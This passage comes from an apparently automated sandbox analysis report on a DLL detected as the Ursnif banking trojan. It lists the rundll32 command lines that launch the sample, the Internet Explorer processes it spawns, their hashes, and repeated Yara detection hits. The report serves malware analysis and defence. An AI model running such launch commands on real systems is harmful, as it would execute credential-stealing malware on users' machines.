                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375909820.0000000005748000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.375980649.0000000005748000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.525785355.0000000005748000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.872902084.0000000005748000.00000004.00000040.sdmp, Author: Joe Security
                            Reputation:high

                            Analysis Process: rundll32.exe PID: 6928 Parent PID: 6900

                            General

                            Start time:11:10:49
                            Start date:12/01/2022
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\SwFlsh32.dll",#1
                            Imagebase:0x11b0000
                            File size:61952 bytes
                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.370670581.00000000050D8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.370609933.00000000050D8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.370654960.00000000050D8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.456592499.00000000050D8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.873845107.00000000050D8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.370682268.00000000050D8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.370731881.00000000050D8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.370523422.00000000050D8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.370634510.00000000050D8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.370551319.00000000050D8000.00000004.00000040.sdmp, Author: Joe Security
                            Reputation:high

                            Analysis Process: rundll32.exe PID: 6936 Parent PID: 6888

                            General

                            Start time:11:10:49
                            Start date:12/01/2022
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe C:\Users\user\Desktop\SwFlsh32.dll,DllRegisterServer
                            Imagebase:0x11b0000
                            File size:61952 bytes
                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.377794576.00000000057F8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.377701167.00000000057F8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.525325990.00000000057F8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.377849557.00000000057F8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.377869270.00000000057F8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.377814213.00000000057F8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.377887122.00000000057F8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.377730405.00000000057F8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000002.874384874.00000000057F8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.377774023.00000000057F8000.00000004.00000040.sdmp, Author: Joe Security
                            Reputation:high

                            Analysis Process: iexplore.exe PID: 6328 Parent PID: 792

                            General

                            Start time:11:10:55
                            Start date:12/01/2022
                            Path:C:\Program Files\internet explorer\iexplore.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                            Imagebase:0x7ff721e20000
                            File size:823560 bytes
                            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Analysis Process: iexplore.exe PID: 4624 Parent PID: 6328

                            General

                            Start time:11:10:56
                            Start date:12/01/2022
                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6328 CREDAT:17410 /prefetch:2
                            Imagebase:0x13b0000
                            File size:822536 bytes
                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Analysis Process: iexplore.exe PID: 4532 Parent PID: 6328

                            General

                            Start time:11:10:57
                            Start date:12/01/2022
                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6328 CREDAT:17414 /prefetch:2
                            Imagebase:0x13b0000
                            File size:822536 bytes
                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Analysis Process: iexplore.exe PID: 5560 Parent PID: 6328

                            General

                            Start time:11:10:58
                            Start date:12/01/2022
                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6328 CREDAT:148484 /prefetch:2
                            Imagebase:0x13b0000
                            File size:822536 bytes
                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: iexplore.exe PID: 5320 Parent PID: 792

                            General

                            Start time:11:11:40
                            Start date:12/01/2022
                            Path:C:\Program Files\internet explorer\iexplore.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                            Imagebase:0x7ff721e20000
                            File size:823560 bytes
                            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: iexplore.exe PID: 1984 Parent PID: 5320

                            General

                            Start time:11:11:41
                            Start date:12/01/2022
                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5320 CREDAT:17410 /prefetch:2
                            Imagebase:0x13b0000
                            File size:822536 bytes
                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: iexplore.exe PID: 5988 Parent PID: 5320

                            General

                            Start time:11:11:42
                            Start date:12/01/2022
                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5320 CREDAT:17414 /prefetch:2
                            Imagebase:0x13b0000
                            File size:822536 bytes
                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: iexplore.exe PID: 5412 Parent PID: 5320

                            General

                            Start time:11:11:42
                            Start date:12/01/2022
                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5320 CREDAT:82946 /prefetch:2
                            Imagebase:0x13b0000
                            File size:822536 bytes
                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: iexplore.exe PID: 6576 Parent PID: 5320

                            General

                            Start time:11:11:43
                            Start date:12/01/2022
                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5320 CREDAT:17418 /prefetch:2
                            Imagebase:0x13b0000
                            File size:822536 bytes
                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: iexplore.exe PID: 660 Parent PID: 792

                            General

                            Start time:11:12:10
                            Start date:12/01/2022
                            Path:C:\Program Files\internet explorer\iexplore.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                            Imagebase:0x7ff721e20000
                            File size:823560 bytes
                            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: iexplore.exe PID: 5004 Parent PID: 660

                            General

                            Start time:11:12:11
                            Start date:12/01/2022
                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:660 CREDAT:17410 /prefetch:2
                            Imagebase:0x13b0000
                            File size:822536 bytes
                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: iexplore.exe PID: 3068 Parent PID: 660

                            General

                            Start time:11:12:12
                            Start date:12/01/2022
                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:660 CREDAT:17414 /prefetch:2
                            Imagebase:0x13b0000
                            File size:822536 bytes
                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: iexplore.exe PID: 2696 Parent PID: 660

                            General

                            Start time:11:12:12
                            Start date:12/01/2022
                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:660 CREDAT:82946 /prefetch:2
                            Imagebase:0x13b0000
                            File size:822536 bytes
                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: iexplore.exe PID: 5512 Parent PID: 660

                            General

                            Start time:11:12:12
                            Start date:12/01/2022
                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:660 CREDAT:148482 /prefetch:2
                            Imagebase:0x13b0000
                            File size:822536 bytes
                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: iexplore.exe PID: 4976 Parent PID: 792

                            General

                            Start time:11:12:35
                            Start date:12/01/2022
                            Path:C:\Program Files\internet explorer\iexplore.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                            Imagebase:0x7ff721e20000
                            File size:823560 bytes
                            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: iexplore.exe PID: 5780 Parent PID: 4976

                            General

                            Start time:11:12:37
                            Start date:12/01/2022
                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4976 CREDAT:17410 /prefetch:2
                            Imagebase:0x13b0000
                            File size:822536 bytes
                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: iexplore.exe PID: 5020 Parent PID: 4976

                            General

                            Start time:11:12:42
                            Start date:12/01/2022
                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4976 CREDAT:17422 /prefetch:2
                            Imagebase:0x13b0000
                            File size:822536 bytes
                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: iexplore.exe PID: 4828 Parent PID: 4976

                            General

                            Start time:11:12:43
                            Start date:12/01/2022
                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4976 CREDAT:17424 /prefetch:2
                            Imagebase:0x13b0000
                            File size:822536 bytes
                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: iexplore.exe PID: 4716 Parent PID: 4976

                            General

                            Start time:11:12:43
                            Start date:12/01/2022
                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4976 CREDAT:345090 /prefetch:2
                            Imagebase:0x13b0000
                            File size:822536 bytes
                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: iexplore.exe PID: 5636 Parent PID: 792

                            General

                            Start time:11:13:04
                            Start date:12/01/2022
                            Path:C:\Program Files\internet explorer\iexplore.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                            Imagebase:0x7ff721e20000
                            File size:823560 bytes
                            MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Analysis Process: iexplore.exe PID: 2288 Parent PID: 5636

                            General

                            Start time:11:13:06
                            Start date:12/01/2022
                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5636 CREDAT:17410 /prefetch:2
                            Imagebase:0x13b0000
                            File size:822536 bytes
                            MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Disassembly

                            Code Analysis

                            Reset < >